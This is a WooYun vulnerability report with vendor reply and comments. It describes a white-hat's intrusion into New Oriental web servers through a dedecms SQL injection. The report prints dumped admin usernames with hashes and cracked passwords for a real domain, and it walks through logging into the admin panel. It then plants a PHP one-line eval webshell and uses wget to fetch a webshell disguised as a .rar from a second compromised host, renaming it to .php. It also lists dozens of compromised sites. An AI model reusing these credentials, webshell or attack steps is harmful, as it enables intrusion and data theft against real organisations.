当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-054133

漏洞标题:新东方一个未修复的漏洞可导致N个站点沦陷

相关厂商:新东方

漏洞作者: U神

提交时间:2014-03-21 15:37

修复时间:2014-05-05 15:37

公开时间:2014-05-05 15:37

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-03-21: 细节已通知厂商并且等待厂商处理中
2014-03-24: 厂商已经确认,细节仅向厂商公开
2014-04-03: 细节向核心白帽子及相关领域专家公开
2014-04-13: 细节向普通白帽子公开
2014-04-23: 细节向实习白帽子公开
2014-05-05: 细节向公众公开

简要描述:

详细说明:

#1.某日新东方一个漏洞对我公开了,于是测试了根本就没去修复,然后我就打算看看能不能拿下Shell,这个漏洞是dedecms的最新注入,注入出帐号密码了,整理了一下,发现居然密码123456的达到那么的多!看来你们很不注重安全!

http://www.maxen.com.cn/------------>>  MaxEn|4e80a008e7b9129a330a   无解
http://www.maxen.com.cn/------------>>  zhibo|ca8173d47fbf2c6dc052   zhiboccw
http://www.maxen.com.cn/------------>>  nicole|c3949ba59abbe56e057f  123456
http://www.maxen.com.cn/------------>>  jiaoxue|c3949ba59abbe56e057f 123456
http://www.maxen.com.cn/------------>>  bjmaxen|c3949ba59abbe56e057f 123456
http://www.maxen.com.cn/------------>>  tjmaxen|c3949ba59abbe56e057f 123456
http://www.maxen.com.cn/------------>>  symaxen|c3949ba59abbe56e057f 123456
http://www.maxen.com.cn/------------>>  cdmaxen|c3949ba59abbe56e057f 123456
http://www.maxen.com.cn/------------>>  cqmaxen|c3949ba59abbe56e057f 123456
http://www.maxen.com.cn/------------>>  gzmaxen|c3949ba59abbe56e057f 123456
http://www.maxen.com.cn/------------>>  aditor|c3949ba59abbe56e057f 123456


通过扫描器得到了后台地址就是:

http://www.maxen.com.cn/dedecms/login.php


成功进入后台如下,使用了第三个帐号权限比较大!

01.jpg


然后通过文件管理器成功得到shell,shell地址:

http://www.maxen.com.cn/plus/show.php

如下图:

02.jpg


#2.可是这个shell的访问目录有权限的,所以无法直接在菜刀上访问其它的目录,如下图:

03.jpg


然后我就在想Web这个目录下应该还有网站,于是通过菜刀的终端管理,使用cd命令成功切换到web目录,再使用dir或者ls命令发现了特别多的网站!最少有30多个!当时就震惊了~

04.jpg


然后我随便切换到了目录“book.xdf.cn”通过"ls -l"命令发现都有写入权限,这下好了~可以写shell了,于是我本来通过echo一句话到该目录下发现提示错误,

echo "<?php eval ($_POST[val]); ?>" >>c.php

如下:

05.jpg


为什么会这样?我不太懂Linux命令,但是我"echo test >c.php"却可以成功写入文件。

06.jpg


#3.最后我想到用wget命令去下载,但是该把PHP的shell放哪里来下载呢?最后我想了一下!有办法了!就放到http://www.maxen.com.cn网站下去,于是在plus下放了一个PHP文件,后来发现!不对!这个网站会解析PHP,下载下来的只能当html来显示了!怎么办?最后想到了一个聪明的办法,先在本地建立了一个文件,写入一句话木马,然后将后缀名改为.rar的压缩包,传到该plus下目录。

07.jpg


#4.我们的思路就是先把u.rar下载下来,这样就不会被解析了,然后通过重命名命令来将u.rar命名为u.php。先随便找了一个网站,就拿“http://answer2014.xdf.cn/”站点来说吧,通过下面几条命令成功下载下shell。

[/neworiental/web/answer2014.xdf.cn/wwwroothttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/]$ wget http://maxen.com.cn/plus/u.rar
--2014-03-20 19:30:51--  http://maxen.com.cn/plus/u.rar
Resolving maxen.com.cn... 116.213.70.29
Connecting to maxen.com.cn|116.213.70.29|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 62 [application/x-rar-compressed]
Saving to: `u.rar'
     0K                                                       100% 8.45M=0s
2014-03-20 19:30:51 (8.45 MB/s) - `u.rar' saved [62/62]
[/neworiental/web/answer2014.xdf.cn/wwwroothttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/]$ dir
blog  u.rar
[/neworiental/web/answer2014.xdf.cn/wwwroothttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/]$ mv u.rar u.php
[/neworiental/web/answer2014.xdf.cn/wwwroothttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/]$ dir
blog  u.php


08.jpg

漏洞证明:

#4.最后连接该shell,成功进去了,开始我以为要每个网站都写入一遍,最后发现这个网站居然有权限跨目录!

09.jpg


N个站点沦陷:

10zn.sz.xdf.cn		    hanjia.xdf.cn	      qiuji.xdf.cn
answer2014.xdf.cn	    kaixue.xdf.cn	      search.xdf.cn
axure.test.xdf.cn	    kouyudasai.xdf.cn	      t.xdf.cn
baby.xdf.cn		    maxen.com.cn	      test.woxue.com
baby.xdf.cn-old		    misc.xdf.cn		      tuan.xdf.cn
bjtf.xdf.cn		    new			      ued.xdf.cn
book.xdf.cn		    nginx_cache		      vipwx.xdf.cn
cakephp1.3		    paike.xdf.cn	      whhuodong.xdf.cn
choujiang		    post.xdf.cn		      www
choujiang.gz.xdf.cn	    proxy.fos.xdf.cn	      www.toefljunior.com.cn
college.xdf.cn		    proxy.heb.xdf.cn	      xdf.oeeee.com
college2		    proxy.jn.xdf.cn	      xueba.xdf.cn
eaccelerator_cache	    proxy.kaoyan.xdf.cn       ying.xdf.cn
forum.toefljuniorchina.com  proxy.szchoujiang.xdf.cn  yqlj.xdf.cn
gdxmwx.xdf.cn		    proxy.xwb.pop.xdf.cn      yubook.xdf.cn


提取下来服务器就可以被控制,服务器上有很多重要信息吧!

15.jpg


为了证明给审核员看其它网站都有写入权限,测试了两个网站~如下证明(请记得删除):

http://baby.xdf.cn/test.php
http://qiuji.xdf.cn/wooyun.txt


10.jpg


11.jpg


各种数据库,可以连很多很多不同的数据库,我就不列举了~有几个有N多会员数据的~

122.jpg


13.jpg

修复方案:

PS:数据库神马的没动,文件神马的没有下载过!包括服务器都没提权,太菜了没办法!只是尝试连接了一两个数据库证明危害性,以上提到的shell地址包括测试的文件请自行删除,为的是防止运维人员再次偷懒!其它什么东西没动,切勿跨省!我是一个有道德意识的白帽子!还有我想说我好像在几个网站看到了别人的shell,请运维人员花时间去看看吧~查杀一下整站!最后想说,求一个高分rank,谢谢!

版权声明:转载请注明来源 U神@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-03-24 11:42

厂商回复:

谢谢提供消息,我们会尽快确认并修复。

最新状态:

暂无

漏洞评价:

评论

  1. 2014-03-21 15:57 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    @xsser 求解释,为何这个N个站点沦陷也走小的?和这个 WooYun: 一个上传点可能导致新东方内网全线沦陷 ——

  2. 2014-03-21 16:06 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @U神 唉 一般很不重要的都才会放虚拟主机

  3. 2014-03-21 16:54 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    @xsser 不像是虚拟机!linux的所有分区可看见,您老怎么看出是虚拟机?

  4. 2014-03-21 17:00 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @U神 虚拟主机

  5. 2014-03-21 17:08 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    @xsser 卧槽!看错了。以为你说虚拟机!新东方厂商很厚道的,会送礼物的!到时候也送你一个!

  6. 2014-03-21 17:23 | PythonPig ( 普通白帽子 | Rank:491 漏洞数:71 | 只会简单工具的小小菜)

    @U神 真心求带 注入 getshell啊,跟你混涨姿势~~

  7. 2014-03-23 23:13 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    @新东方 目测厂商已经看了漏洞,测试文件都删了,就是那个SQL注入怎么还不修复呢?

  8. 2014-03-24 11:45 | 新东方(乌云厂商)

    @U神 谢谢,这个系统是外包商开发,已经通知相关公司修复。

  9. 2014-06-10 22:10 | redcar ( 路人 | Rank:0 漏洞数:1 | 找到组织了!)

    mark一下

  10. 2014-06-30 23:13 | F4K3R ( 普通白帽子 | Rank:297 漏洞数:31 | 学习)

    关于那个echo "<?php eval ($_POST[val]); ?>" >>c.php 遇到空格会截断!